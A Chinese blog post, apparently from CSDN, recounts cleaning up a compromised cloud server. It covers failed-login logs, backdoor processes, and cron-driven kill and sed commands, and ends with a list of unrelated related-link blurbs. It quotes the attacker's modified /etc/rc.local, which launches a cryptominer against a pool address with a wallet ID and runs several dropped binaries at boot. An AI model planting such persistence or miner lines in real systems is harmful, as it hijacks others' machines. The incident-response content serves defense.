攻击类型:
主要是后门和肉鸡行为
先解决后门的问题:
步骤
(1)搞清楚后门文件的来历(是如何产生的)
(2)删除后门文件
具体做法:
使用定时器 定期删除后门文件
待删除的文件列表:
(a)/usr/bin/acpid
(b)/usr/bin/bsd-port/agent
定时器要执行的脚本:
定时器:
如何解决肉鸡行为呢?
查看/var/log/secure ,看到确实被多次尝试登陆
[root@iZ25tti3rxdZ log]# cat secure| grep 'Failed password' | cut -d " " -f 9,10,11 | sort | uniq apache from 121.42.0.30 ftp from 121.42.0.30 invalid user admin invalid user test invalid user user mail from 121.42.0.30 root from 121.42.0.30
发现可疑进程:
如何提高安全性?
我觉得应该有一个机制:
当主机被大量尝试登录时应该增加提醒,比如发邮件或者发短信
查看root的home目录下的.bash_history
终于发现了猫腻:
同时还修改我系统核心文件/etc/rc.local
于是查看/etc/rc.local 的修改记录:
[root@iZ25tti3rxdZ ~]# stat /etc/rc.local
File: `/etc/rc.local'
Size: 390 Blocks: 8 IO Block: 4096 regular file
Device: ca01h/51713dInode: 787612 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2016-01-10 16:34:59.807094407 +0800
Modify: 2015-12-07 11:23:07.160211728 +0800
Change: 2015-12-07 11:23:07.160211728 +0800
说明在2015-12-07 11:23:07被人恶意修改过
再看看修改成啥样了:
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.
touch /var/lock/subsys/local
/tmp/minerd -a scrypt -o 220.135.22.146:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk
/mnt/linsx
/mnt/linsx
/mnt/linsx
/mnt/linsx
/tmp/linex
/tmp/linex
/tmp/2897
/tmp/2897
~
正常的:
解决方法:
sed -i 's/^\(.*scrypt\)/# \1/' /etc/rc.local
sed -i 's/^\(.*\/mnt\/linsx\)/# \1/' /etc/rc.local
sed -i 's/^\(.*\/tmp\/\)/# \1/' /etc/rc.local
异常进程:
[root@iZ25tti3rxdZ ~]# ps -ef |grep "/usr/bin/acpid" |grep -v grep
root 16790 1 0 16:48 ? 00:00:00 /usr/bin/acpid
root 16804 16790 0 16:48 ? 00:00:00 /usr/bin/acpid
root 16805 16804 0 16:48 ? 00:00:00 /usr/bin/acpid
如何杀*死异常进程:
ps -ef |grep "/usr/bin/acpid" |grep -v grep |awk -F" " {'print $2'}|xargs -i kill -9 {}
ps -ef |grep "/usr/bin/bsd-port/agent" |grep -v grep |awk -F" " {'print $2'}|xargs -i kill -9 {}
上述代码是在定时器中执行的,每10分钟执行一次
相关推荐
09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云主机配置_ffmpeg编译09_12_阿里云...
阿里云虚拟主机操作
Qt远程连接阿里云主机上的MySQL源码
一、登陆阿里云主机后台,获取主机信息并修改主机的环境参数。二、通过ftp工具把wordpress程序进行上传。三、在线安装wordpress程序。
简单阿里云主机环境项目搭建。现在很多服务都部署在云服务上,最近项目也要发布到云上,特写此文章。有需要部署云服务的小伙伴可以参考下。
阿里云等级保护2.0解决方案与持续安全运营方案 阿里云-等保合规安全方案报价表; 阿里云安全整体解决方案; 阿里云等保2.0解读视频; 阿里云安全白皮书; 阿里云大数据安全实践; 阿里面向大规模并发实时数仓业务...
阿里云网站迁移步骤: 材料:新老空间的FTP登录用户名和密码、FTP上传工具 1.第一步,提取备份。先登录老空间的账号,进入主界面后依次点击:工具服务—备份恢复,分别提取下载一份网页文件和一份数据库备份...
1-4 阿里云管理控制台使用 2-1 ECS云服务构建 2-2 阿里云节点BGP和专线概念介绍 2-3 ECS如何按照地域区域选型 2-4 ECS按照配置选型(1) 2-5 ECS按照配置选型(2) 2-6 ECS创建 2-7 阿里云VPC专有网络 2-8 阿里云弹性...
二、阿里云数据中台行业解决方案白皮书 阿里云数据中台-服饰行业消费者个性化服务解决方案 阿里云数据中台-金融行业数据资产管理解决方案 阿里云数据中台-金融行业线上理财业务数字化运营解决方案 阿里云数据中台-...
阿里云主机是什么.docx
阿里云智慧农业园区解决方案,阿里云LOT现代农业园区解决方案,现代农业园区大数据平台解决方案,云南阿里云生态服务中心
此程序为C#编写,编写编译环境VS2019,主要作用为以mqtt方式连接阿里云物联网平台,程序中需要修改的位置已经注释,自行修改以后可以直接使用,在连接阿里云平台时会出现一个警告说是“输入的字符格式错误”,虽说不...
阿里云云安全助理工程师ACA复习资料(完结)全套资料.docx阿里云云安全助理工程师ACA复习资料(完结)全套资料.docx阿里云云安全助理工程师ACA复习资料(完结)全套资料.docx阿里云云安全助理工程师ACA复习资料(完结)全套...
云上客户对安全投入的驱动力 特定安全事件的产品方案 安全防护的木桶理论 ...云上安全整体解决方案 云上系统等保合规“一站式”解决方案 传统安全体系到云安全体系的转变 混合云态势感知解决方案 云上安全“三字经”
阿里云短信服务提供了多种发送方式,包括 API 接口、SDK 等。其中,API 接口是最常用的方式之一,它可以通过 HTTP/HTTPS 协议进行调用,使用简单、灵活。开发者只需要通过阿里云的控制台获取 AccessKey 和 SecretKey...
阿里云产品手册2022-2023版.pdf 阿里云产品手册2022-2023版.pdf 阿里云产品手册2022-2023版.pdf 阿里云产品手册2022-2023版.pdf 阿里云产品手册2022-2023版.pdf 阿里云产品手册2022-2023版.pdf 阿里云产品手册2022-...
一个基于asp+access/mssql开发的阿里云虚拟主机代理平台源码,支持通过代理商API进行阿里云虚拟主机的新开续费,支持西部数码的域名、虚拟主机和云服务器的新开续费,同时支持在线支付、产品管理、新闻管理、日志...
阿里云网络拓扑图阿里云网络拓扑图阿里云网络拓扑图阿里云网络拓扑图阿里云网络拓扑图阿里云网络拓扑图阿里云网络拓扑图阿里云网络拓扑图阿里云网络拓扑图阿里云网络拓扑图阿里云网络拓扑图阿里云网络拓扑图阿里云...
阿里云主机实例war包,实例详情请访问博主博客:http://blog.csdn.net/u013142781
阿里云安全解决方案。